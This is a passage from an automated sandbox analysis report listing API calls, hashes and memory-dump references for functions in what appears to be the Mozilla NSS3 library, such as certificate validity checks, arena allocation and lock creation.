                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 702c8ef653eb167796a70106d037ef9ce7752382bdd7065bf7b66a68aeaa0d60
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91915AB0A01701AFDB20EF398C09F5B7AF4AB0A705F01442EE55AD6F40DB70A545CF9A
                                                                                                                                                                                                                                                      Function 6C47DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C47DDDE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C47DDF5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C47DE34
                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6C47DE93
                                                                                                                                                                                                                                                      • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C47DE9D
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C47DEB4
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C47DEC3
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C47DED8
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s%s,?,?), ref: 6C47DEF0
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(6C5AAAF9,(NULL) (Validity Unknown)), ref: 6C47DF04
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C47DF13
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C47DF22
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C47DF33
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C47DF3C
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C47DF4B
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C47DF74
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47DF8E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                                                                                                                                                                                                      • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                                                                                                                                                                                                      • API String ID: 1882561532-3437882492
                                                                                                                                                                                                                                                      • Opcode ID: f903b398dd25a574a3913785b5362bd166a31cd7570a9425ab3511bc87652cc3
                                                                                                                                                                                                                                                      • Instruction ID: 5d2cab7aa7a231bbd47c5a4810f90e8261fe8cef47e5d1bfcf3dc338b40adf94
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f903b398dd25a574a3913785b5362bd166a31cd7570a9425ab3511bc87652cc3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB51BFB1E012159BDB21DE659C41EAF7AB9EF85359F144029EC09EBB00E731E905CBF2
                                                                                                                                                                                                                                                      Function 6C4B2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C4B2DEC
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C4B2E00
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B2E2B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B2E43
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C,?,-00000001,00000000,?), ref: 6C4B2E74
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C,?,-00000001,00000000), ref: 6C4B2E88
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C4B2EC6
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C4B2EE4
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C4B2EF8
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B2F62
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B2F86
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B2F9E
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B2FCA
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B301A
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4B302E
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B3066
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B3085
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B30EC
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B310C
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B3124
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B314C
                                                                                                                                                                                                                                                        • Part of subcall function 6C499180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C4C379E,?,6C499568,00000000,?,6C4C379E,?,00000001,?), ref: 6C49918D
                                                                                                                                                                                                                                                        • Part of subcall function 6C499180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C4C379E,?,6C499568,00000000,?,6C4C379E,?,00000001,?), ref: 6C4991A0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B316D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3383223490-0
                                                                                                                                                                                                                                                      • Opcode ID: 5474398e97d62492a9fec835fa086781d88a27c2eaa2c80afe9bc6f1c38a431c
                                                                                                                                                                                                                                                      • Instruction ID: d64a09e59ee7621d3cac2b732c3709dcc1b3eddb7e37276ce909ca4f765f170a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5474398e97d62492a9fec835fa086781d88a27c2eaa2c80afe9bc6f1c38a431c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EF19DB5D006189FEF00DF65DC88F9ABBB4BF09318F054168EC05AB711EB31A995CB91
                                                                                                                                                                                                                                                      Function 6C499FA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CERT_NewCertList.NSS3 ref: 6C499FBE
                                                                                                                                                                                                                                                        • Part of subcall function 6C472F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C472F0A
                                                                                                                                                                                                                                                        • Part of subcall function 6C472F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C472F1D
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C49A015
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6C4B563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6C4B195C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1940: EnterCriticalSection.KERNEL32(?,?,6C4B563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6C48EAC5,00000001), ref: 6C4B1970
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6C48EAC5,00000001,?,6C48CE9B,00000001,6C48EAC5), ref: 6C4B19A0
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C49A067
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C49A055
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49A07E
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C49A0B1
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C49A0C7
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C49A0CF
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C49A12E
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C49A140
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C49A148
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49A158
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C49A175
                                                                                                                                                                                                                                                      • CERT_AddCertToListTail.NSS3(00000000,00000000), ref: 6C49A1A5
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6C49A1B2
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C49A1C6
                                                                                                                                                                                                                                                      • CERT_DestroyCertList.NSS3(00000000), ref: 6C49A1D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B55E0: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,6C48EAC5,00000001,?,6C48CE9B,00000001,6C48EAC5,00000003,-00000004,00000000,?,6C48EAC5), ref: 6C4B5627
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B55E0: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0,?,?,?,?,?,?,?,?,?,?,6C48EAC5,00000001,?,6C48CE9B), ref: 6C4B564F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B55E0: PL_FreeArenaPool.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C48EAC5,00000001), ref: 6C4B5661
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B55E0: PR_SetError.NSS3(FFFFE01A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C48EAC5), ref: 6C4B56AF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Arena$Pool$CallFreeOnce$CertErrorFinishList$CriticalDestroyEnterInitSectionUnlockUtilValue$Alloc_Arena_CertificateTailfree
                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                      • API String ID: 3250630715-3315324353
                                                                                                                                                                                                                                                      • Opcode ID: 82fb20c9bbb4804016864a766c1c997304b82320cdcded9c3637b517844bd5d6
                                                                                                                                                                                                                                                      • Instruction ID: 14c73738dbf2f440161eb4b6963cf378240da025ca7cdd97921979b09d103696
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82fb20c9bbb4804016864a766c1c997304b82320cdcded9c3637b517844bd5d6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2651E5B1D00319ABEB10DFA8DD45FAE7778EF4130DF110528E809AAB41E775A909C7E6
                                                                                                                                                                                                                                                      Function 6C4B4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B4C4C
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4B4C60
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CA1
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CBE
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CD2
                                                                                                                                                                                                                                                      • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4D3A
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4D4F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4DB7
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B4DD7
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4B4DEC
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B4E1B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B4E2F
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4E5A
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B4E71
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4B4E7A
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B4EA2
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B4EC1
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4B4ED6
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B4F01
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4B4F2A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 759471828-0
                                                                                                                                                                                                                                                      • Opcode ID: 2c046c59efbbf7f81926f08c9ff29be44e992d66801496969ec8f85c0da36279
                                                                                                                                                                                                                                                      • Instruction ID: ec85f4ea06bd91f589fc39cf979e1f75ffd5b12df85eda253c4edd044a33254a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c046c59efbbf7f81926f08c9ff29be44e992d66801496969ec8f85c0da36279
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6B10075A002059FEB01EF68DC44FAA77B4BF09359F055128ED15ABB01E730EA65CBE1
                                                                                                                                                                                                                                                      Function 6C4BFFB0 Relevance: 30.1, APIs: 20, Instructions: 68COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFB4
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFC6
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C539946
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3F16B7,00000000), ref: 6C53994E
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: free.MOZGLUE(00000000), ref: 6C53995E
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFD6
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFE6
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFF6
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0006
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0016
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0026
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0036
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0046
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0056
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0066
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0076
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0086
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0096
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00A6
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00B6
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00C6
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00D6
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00E6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
